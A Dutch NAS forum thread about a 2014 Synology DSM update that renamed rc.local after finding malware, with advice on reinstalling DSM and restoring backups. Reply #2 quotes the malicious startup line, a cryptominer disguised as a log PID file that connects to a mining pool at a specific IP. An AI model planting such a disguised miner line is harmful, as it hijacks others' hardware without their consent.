Auteur Topic: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware  (gelezen 12940 keer)

Offline JSSL

  • Bedankjes
  • -Gegeven: 9
  • -Ontvangen: 9
  • Berichten: 172
Beste forumleden,

Ik heb zojuist ook de NAS geupgrade naar 5.0-4528. Nu kreeg ik na de update een melding dat rc.local is renamed naar rc.local.bak vanwege mogelijke malware.
Ik kan zo snel niks hierover vinden op google.

Iemand enig idee, kan op het moment namelijk nog niet ssh gebruiken i.v.m. het onderweg zijn

Mvg,
Jarno
  • Mijn Synology: Ds1618+
  • HDD's: 6x WD 8tb

Ben(V)

  • Gast
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #1 Gepost op: 22 oktober 2014, 16:04:05 »
In de releasenotes staat:

This hotfix will remove the current known malware on your Synology NAS.

Ik vermoed dat hij die rc.local als potentiele malware ziet.
Als je iets in rc.local stopt wordt dat bij het init process van linux opgestart.

Synology gebruikt bij mijn weten geen rc.local dus zal het wel als malware aangemerkt worden.
Het kan natuurlijk dat een legitiem package dit gedaan heeft maar is eigenlijk niet gebruikelijk voor applicaties daar iets in te zetten.
Gewoon even met Winscp erin kijken wat hij opstart.

PS. Op geen van mijn Synologies is een rc.local aanwezig.


Offline JSSL

  • Bedankjes
  • -Gegeven: 9
  • -Ontvangen: 9
  • Berichten: 172
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #2 Gepost op: 22 oktober 2014, 16:33:48 »
Ben, Bedankt voor je reactie! Ik heb toch maar even met een omweg ssh gebruikt naar de desbetreffende Synology. Wat blijkt, het is nog een bitcoin miner van februari :o
Dit stond er in de rc.local: /var/run/httpd-log.pid -B -q -o stratum+tcp://93.174.95.67:3340

Is het verstandig om DSM opnieuw te installeren met behoud van de bestanden of is dit al voldoende?

  • Mijn Synology: Ds1618+
  • HDD's: 6x WD 8tb

Ben(V)

  • Gast
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #3 Gepost op: 22 oktober 2014, 17:05:04 »
Dit is wel voldoende om van die miner af te komen maar hij staat nog steeds ergens op je NAS.
Ook begreep ik dat die miner de resource monitor verving om geen 100% cpu te tonen.

Persoonlijk zou ik DSM er opnieuw opzetten, maar kan natuurlijk niet zien hoeveel ongemak dat voor jou oplevert.

Offline JSSL

  • Bedankjes
  • -Gegeven: 9
  • -Ontvangen: 9
  • Berichten: 172
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #4 Gepost op: 22 oktober 2014, 17:09:53 »
Ik heb nog gezocht naar de bekende mappen die met deze bitcoinminer er moesten zijn. Daarnaast is er ook geen proces te zien die mined. Net of dit alles al is verwijderd door Synology's update..
  • Mijn Synology: Ds1618+
  • HDD's: 6x WD 8tb

Ben(V)

  • Gast
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #5 Gepost op: 22 oktober 2014, 17:15:28 »
Dat zeggen ze eigenlijk wel he.

Offline Birdy

  • Global Moderator
  • MVP
  • *
  • Bedankjes
  • -Gegeven: 1381
  • -Ontvangen: 8004
  • Berichten: 44.017
  • Alleen een PB sturen als hier om gevraag wordt.
    • Truebase
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #6 Gepost op: 22 oktober 2014, 17:24:55 »
Citaat
Net of dit alles al is verwijderd door Synology's update..
Mooi plus punt van deze update  ;D


CS406      DSM 2.0-0731    DS508      DSM 4.0-2265      DS411+II  DSM 6.2.4-25556-7   DS115J    DSM 7.1.1-42962-5   DS918+    DSM 6.2.4-25556-7
DS107+     DSM 3.1-1639    DS411slim  DSM 6.2.4-25556   DS213J    DSM 6.2.4-25556-7   DS1515+   DSM 6.2.4-25556-7   DS220+    DSM 7.2.2-72806-1
DS107+     DSM 3.1-1639    DS111      DSM 5.2-5967-9    DS413J    DSM 6.2.3-25426-2   DS716+II  DSM 7.2.2-72806-1   RT2600ac  SRM 1.3.1-9346-12
BeeDrive   1TB             BeeServer  BSM 1.1-65374                                                                 MR2200ac  SRM 1.3.1-9346-12

Offline JSSL

  • Bedankjes
  • -Gegeven: 9
  • -Ontvangen: 9
  • Berichten: 172
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #7 Gepost op: 24 oktober 2014, 09:46:57 »
Als ik DSM er opnieuw op zet, kan ik dan alle instellingen terug zetten met de configuration backup? En werkt het dan eigenlijk hetzelfde als nu? Nog geen ervaring met de synology resetten namelijk :lol:
Synology is namelijk zelf niet zeker in hoeverre het na de update verwijderd is..
  • Mijn Synology: Ds1618+
  • HDD's: 6x WD 8tb

Offline Hofstede

  • MVP
  • *
  • Bedankjes
  • -Gegeven: 10
  • -Ontvangen: 1455
  • Berichten: 6.095
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #8 Gepost op: 24 oktober 2014, 10:07:31 »
Je kunt inderdaad de configuratie backuppen en dan na herinstallatie van DSM terugzetten. Dit werkt alleen niet voor de packages, die moet je opnieuw installeren en configureren.
Let wel op dat je de procedure uitvoert via de reset-knop en niet via DSM->Terug naar fabrieksinstellingen. Als je de laatste gebruikt wist de NAS ook al je data.

Offline JSSL

  • Bedankjes
  • -Gegeven: 9
  • -Ontvangen: 9
  • Berichten: 172
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #9 Gepost op: 24 oktober 2014, 10:45:17 »
Dienen de foto's ook uit de map photo gehaald te worden of overschrijft Photostation die map niet bij het installeren van dat pakket?
  • Mijn Synology: Ds1618+
  • HDD's: 6x WD 8tb

Offline Hofstede

  • MVP
  • *
  • Bedankjes
  • -Gegeven: 10
  • -Ontvangen: 1455
  • Berichten: 6.095
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #10 Gepost op: 24 oktober 2014, 10:57:44 »
Nee, data blijft gewoon staan. Het is wel aan te bevelen om een backup te maken voor herinstallatie, het kan tenslotte onverwacht fout gaan (eigenlijk hoor je sowieso een backup van je NAS te hebben). Met de backup functie van de NAS kun je ook de PhotoStation database backuppen. Die kun je dan na herinstallatie terugzetten, dan hoeft PhotoStation niet alles opnieuw te indexeren.

kuba

  • Gast
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #11 Gepost op: 24 oktober 2014, 12:02:53 »
In de releasenotes staat:

This hotfix will remove the current known malware on your Synology NAS.

Ik vermoed dat hij die rc.local als potentiele malware ziet.
Als je iets in rc.local stopt wordt dat bij het init process van linux opgestart.

Synology gebruikt bij mijn weten geen rc.local dus zal het wel als malware aangemerkt worden.
Het kan natuurlijk dat een legitiem package dit gedaan heeft maar is eigenlijk niet gebruikelijk voor applicaties daar iets in te zetten.
Gewoon even met Winscp erin kijken wat hij opstart.

PS. Op geen van mijn Synologies is een rc.local aanwezig.

Hallo, ik zag dit bericht een tikkeltje laat, maar ik moet hier even opmerken dat /etc/rc.local op zich geen ongebruikelijk iets is. Op mijn systeem bestaat hij. Ik kan me in ieder geval niet herinneren dat ik dit bestand ooit zelf heb aangemaakt. Ik denk dat hij bij de installatie van iPKG meekwam.
Dit staat erin:

#!/bin/sh

# Optware setup
[ -x /etc/rc.optware ] && /etc/rc.optware start

exit 0

Bij mij is de rc.local tijdens de update met rust gelaten. DSM update scant zo te horen dus actief op de inhoud van de rc.local. En dat is een geruststellend idee. ik begin die Syno steeds beter te vinden. :-)


Offline Birdy

  • Global Moderator
  • MVP
  • *
  • Bedankjes
  • -Gegeven: 1381
  • -Ontvangen: 8004
  • Berichten: 44.017
  • Alleen een PB sturen als hier om gevraag wordt.
    • Truebase
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #12 Gepost op: 24 oktober 2014, 12:12:42 »
DAT is dan weer vreemd, zou hetzelfde verwachten bij jou als wat TS gebeurde.  :S


CS406      DSM 2.0-0731    DS508      DSM 4.0-2265      DS411+II  DSM 6.2.4-25556-7   DS115J    DSM 7.1.1-42962-5   DS918+    DSM 6.2.4-25556-7
DS107+     DSM 3.1-1639    DS411slim  DSM 6.2.4-25556   DS213J    DSM 6.2.4-25556-7   DS1515+   DSM 6.2.4-25556-7   DS220+    DSM 7.2.2-72806-1
DS107+     DSM 3.1-1639    DS111      DSM 5.2-5967-9    DS413J    DSM 6.2.3-25426-2   DS716+II  DSM 7.2.2-72806-1   RT2600ac  SRM 1.3.1-9346-12
BeeDrive   1TB             BeeServer  BSM 1.1-65374                                                                 MR2200ac  SRM 1.3.1-9346-12

kuba

  • Gast
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #13 Gepost op: 24 oktober 2014, 12:15:36 »
Ik heb mijn pst hierboven even aangevuld met een extra opmerking: DSM update scant m.i. op de inhoud van /etc/rc.local, niet op het bestaan van het bestand zelf.  De inhoud van mijn rc.local is -zoals je ziet- tamelijk onschuldig.

Offline Birdy

  • Global Moderator
  • MVP
  • *
  • Bedankjes
  • -Gegeven: 1381
  • -Ontvangen: 8004
  • Berichten: 44.017
  • Alleen een PB sturen als hier om gevraag wordt.
    • Truebase
Re: Update naar 5.0-4528 rc.local renamed naar rc.local.bak vanwege malware
« Reactie #14 Gepost op: 24 oktober 2014, 12:20:10 »
@JSSL
Dan zou ik wel eens willen zien wat er in rc.local.bak staat.


CS406      DSM 2.0-0731    DS508      DSM 4.0-2265      DS411+II  DSM 6.2.4-25556-7   DS115J    DSM 7.1.1-42962-5   DS918+    DSM 6.2.4-25556-7
DS107+     DSM 3.1-1639    DS411slim  DSM 6.2.4-25556   DS213J    DSM 6.2.4-25556-7   DS1515+   DSM 6.2.4-25556-7   DS220+    DSM 7.2.2-72806-1
DS107+     DSM 3.1-1639    DS111      DSM 5.2-5967-9    DS413J    DSM 6.2.3-25426-2   DS716+II  DSM 7.2.2-72806-1   RT2600ac  SRM 1.3.1-9346-12
BeeDrive   1TB             BeeServer  BSM 1.1-65374                                                                 MR2200ac  SRM 1.3.1-9346-12


 

Hoe installeer ik een update roundcube?

Gestart door GensNetBoard Mail Station

Reacties: 3
Gelezen: 2413
Laatste bericht 25 juni 2012, 15:38:17
door Robert Koopman
Update DSM 7.1 in eeuwige loop van bijwerken.

Gestart door Botak1937Board Synology DSM 7.1

Reacties: 1
Gelezen: 661
Laatste bericht 03 augustus 2023, 11:51:46
door Birdy
DSM 7.2.1-69057 Update 6

Gestart door BirdyBoard Synology DSM 7.2

Reacties: 28
Gelezen: 650
Laatste bericht Gisteren om 22:00:58
door Birdy
Update Cloud Station op PC werkt niet

Gestart door jervanhegBoard Cloud Station & Drive

Reacties: 2
Gelezen: 1765
Laatste bericht 18 december 2014, 00:22:09
door Robbedoes
firmware update DS108J

Gestart door jhcernstBoard Synology DSM algemeen

Reacties: 2
Gelezen: 2583
Laatste bericht 11 februari 2009, 19:52:17
door jhcernst